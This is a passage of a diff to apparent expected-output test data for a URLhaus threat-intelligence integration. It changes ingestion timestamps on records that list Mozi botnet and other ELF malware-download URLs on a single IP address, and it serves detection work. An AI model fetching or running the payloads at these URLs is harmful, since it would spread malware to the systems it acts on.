@@ -23415,7 +23415,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028057700Z", + "ingested": "2021-12-14T14:56:15.726599146Z", "original": "{\"id\":\"961059\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961059/\",\"url\":\"http://89.160.20.156:55254/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23464,7 +23464,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028065200Z", + "ingested": "2021-12-14T14:56:15.726599519Z", "original": "{\"id\":\"961060\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961060/\",\"url\":\"http://89.160.20.156:43010/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23513,7 +23513,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028072500Z", + "ingested": "2021-12-14T14:56:15.726599891Z", "original": "{\"id\":\"961061\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961061/\",\"url\":\"http://89.160.20.156:37886/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -23562,7 +23562,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028079500Z", + "ingested": "2021-12-14T14:56:15.726600267Z", "original": "{\"id\":\"961062\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961062/\",\"url\":\"http://89.160.20.156:40153/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23611,7 +23611,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028086400Z", + "ingested": "2021-12-14T14:56:15.726600783Z", "original": "{\"id\":\"961063\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961063/\",\"url\":\"http://89.160.20.156:34305/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23660,7 +23660,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028093200Z", + "ingested": "2021-12-14T14:56:15.726601193Z", "original": "{\"id\":\"961064\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961064/\",\"url\":\"http://89.160.20.156:35653/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -23709,7 +23709,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028100200Z", + "ingested": "2021-12-14T14:56:15.726601556Z", "original": "{\"id\":\"961065\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961065/\",\"url\":\"http://89.160.20.156:48908/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23758,7 +23758,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028107Z", + "ingested": "2021-12-14T14:56:15.726601914Z", "original": "{\"id\":\"961058\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961058/\",\"url\":\"http://89.160.20.156:40035/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23807,7 +23807,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028114Z", + "ingested": "2021-12-14T14:56:15.726602283Z", "original": "{\"id\":\"961055\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961055/\",\"url\":\"http://89.160.20.156:54461/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -23856,7 +23856,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028120900Z", + "ingested": "2021-12-14T14:56:15.726602758Z", "original": "{\"id\":\"961056\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961056/\",\"url\":\"http://89.160.20.156:51991/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23905,7 +23905,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028127700Z", + "ingested": "2021-12-14T14:56:15.726603128Z", "original": "{\"id\":\"961057\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961057/\",\"url\":\"http://89.160.20.156:41143/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", @@ -23954,7 +23954,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028134600Z", + "ingested": "2021-12-14T14:56:15.726603493Z", "original": "{\"id\":\"961054\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961054/\",\"url\":\"http://89.160.20.156:51095/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:02:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", 
@@ -24003,7 +24003,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028141600Z", + "ingested": "2021-12-14T14:56:15.726603860Z", "original": "{\"id\":\"961053\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961053/\",\"url\":\"http://89.160.20.156:36558/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24052,7 +24052,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028148500Z", + "ingested": "2021-12-14T14:56:15.726604307Z", "original": "{\"id\":\"961050\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961050/\",\"url\":\"http://89.160.20.156:47548/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24101,7 +24101,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028155300Z", + "ingested": "2021-12-14T14:56:15.726604757Z", "original": "{\"id\":\"961051\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961051/\",\"url\":\"http://89.160.20.156:35796/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -24150,7 +24150,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028162300Z", + "ingested": "2021-12-14T14:56:15.726605125Z", "original": "{\"id\":\"961052\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961052/\",\"url\":\"http://89.160.20.156:42765/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24199,7 +24199,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028169300Z", + "ingested": "2021-12-14T14:56:15.726605494Z", "original": "{\"id\":\"961048\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961048/\",\"url\":\"http://89.160.20.156:37388/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24248,7 +24248,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028176200Z", + "ingested": "2021-12-14T14:56:15.726605860Z", "original": "{\"id\":\"961049\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961049/\",\"url\":\"http://89.160.20.156:56849/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -24297,7 +24297,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028183300Z", + "ingested": "2021-12-14T14:56:15.726606354Z", "original": "{\"id\":\"961047\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961047/\",\"url\":\"http://89.160.20.156:35574/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24346,7 +24346,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028190300Z", + "ingested": "2021-12-14T14:56:15.726606718Z", "original": "{\"id\":\"961046\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961046/\",\"url\":\"http://89.160.20.156:46947/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24395,7 +24395,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028197600Z", + "ingested": "2021-12-14T14:56:15.726607084Z", "original": "{\"id\":\"961043\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961043/\",\"url\":\"http://89.160.20.156:34452/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -24444,7 +24444,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028205200Z", + "ingested": "2021-12-14T14:56:15.726607454Z", "original": "{\"id\":\"961044\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961044/\",\"url\":\"http://89.160.20.156:33017/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24493,7 +24493,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028212200Z", + "ingested": "2021-12-14T14:56:15.726607920Z", "original": "{\"id\":\"961045\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961045/\",\"url\":\"http://89.160.20.156:55061/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24542,7 +24542,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028219100Z", + "ingested": "2021-12-14T14:56:15.726608481Z", "original": "{\"id\":\"961040\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961040/\",\"url\":\"http://89.160.20.156:50046/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -24591,7 +24591,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028225900Z", + "ingested": "2021-12-14T14:56:15.726608857Z", "original": "{\"id\":\"961041\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961041/\",\"url\":\"http://89.160.20.156:51960/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24640,7 +24640,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028233Z", + "ingested": "2021-12-14T14:56:15.726609712Z", "original": "{\"id\":\"961042\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961042/\",\"url\":\"http://89.160.20.156:42372/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24689,7 +24689,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028239800Z", + "ingested": "2021-12-14T14:56:15.726610134Z", "original": "{\"id\":\"961039\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961039/\",\"url\":\"http://89.160.20.156:51592/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:49:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -24738,7 +24738,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028246700Z", + "ingested": "2021-12-14T14:56:15.726610628Z", "original": "{\"id\":\"961038\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961038/\",\"url\":\"http://89.160.20.156:35585/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24787,7 +24787,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028255700Z", + "ingested": "2021-12-14T14:56:15.726610991Z", "original": "{\"id\":\"961035\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961035/\",\"url\":\"http://89.160.20.156:38398/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24836,7 +24836,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028263300Z", + "ingested": "2021-12-14T14:56:15.726611357Z", "original": "{\"id\":\"961036\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961036/\",\"url\":\"http://89.160.20.156:59880/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -24885,7 +24885,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028270200Z", + "ingested": "2021-12-14T14:56:15.726611730Z", "original": "{\"id\":\"961037\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961037/\",\"url\":\"http://89.160.20.156:39138/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24935,7 +24935,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028277200Z", + "ingested": "2021-12-14T14:56:15.726612160Z", "original": "{\"id\":\"961033\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961033/\",\"url\":\"http://89.160.20.156:51095/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:40:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -24984,7 +24984,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028284200Z", + "ingested": "2021-12-14T14:56:15.726612519Z", "original": "{\"id\":\"961034\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961034/\",\"url\":\"http://89.160.20.156:45117/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:40:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", 
@@ -25033,7 +25033,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028291200Z", + "ingested": "2021-12-14T14:56:15.726612883Z", "original": "{\"id\":\"961032\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961032/\",\"url\":\"http://89.160.20.156:50204/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25082,7 +25082,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028299Z", + "ingested": "2021-12-14T14:56:15.726613247Z", "original": "{\"id\":\"961029\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961029/\",\"url\":\"http://89.160.20.156:45079/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25131,7 +25131,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028306100Z", + "ingested": "2021-12-14T14:56:15.726613795Z", "original": "{\"id\":\"961030\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961030/\",\"url\":\"http://89.160.20.156:52238/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -25180,7 +25180,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028313Z", + "ingested": "2021-12-14T14:56:15.726614230Z", "original": "{\"id\":\"961031\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961031/\",\"url\":\"http://89.160.20.156:40312/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25229,7 +25229,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028319900Z", + "ingested": "2021-12-14T14:56:15.726614599Z", "original": "{\"id\":\"961026\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961026/\",\"url\":\"http://89.160.20.156:39002/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25278,7 +25278,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028326800Z", + "ingested": "2021-12-14T14:56:15.726614959Z", "original": "{\"id\":\"961027\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961027/\",\"url\":\"http://89.160.20.156:50773/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -25327,7 +25327,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028333700Z", + "ingested": "2021-12-14T14:56:15.726615333Z", "original": "{\"id\":\"961028\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961028/\",\"url\":\"http://89.160.20.156:50050/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25376,7 +25376,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028340600Z", + "ingested": "2021-12-14T14:56:15.726615801Z", "original": "{\"id\":\"961024\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961024/\",\"url\":\"http://89.160.20.156:60081/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25425,7 +25425,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028347500Z", + "ingested": "2021-12-14T14:56:15.726616166Z", "original": "{\"id\":\"961025\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961025/\",\"url\":\"http://89.160.20.156:58177/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -25474,7 +25474,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028354800Z", + "ingested": "2021-12-14T14:56:15.726616559Z", "original": "{\"id\":\"961023\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961023/\",\"url\":\"http://89.160.20.156:38589/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25523,7 +25523,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028362400Z", + "ingested": "2021-12-14T14:56:15.726616928Z", "original": "{\"id\":\"961022\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961022/\",\"url\":\"http://89.160.20.156:39229/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:35:25 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25572,7 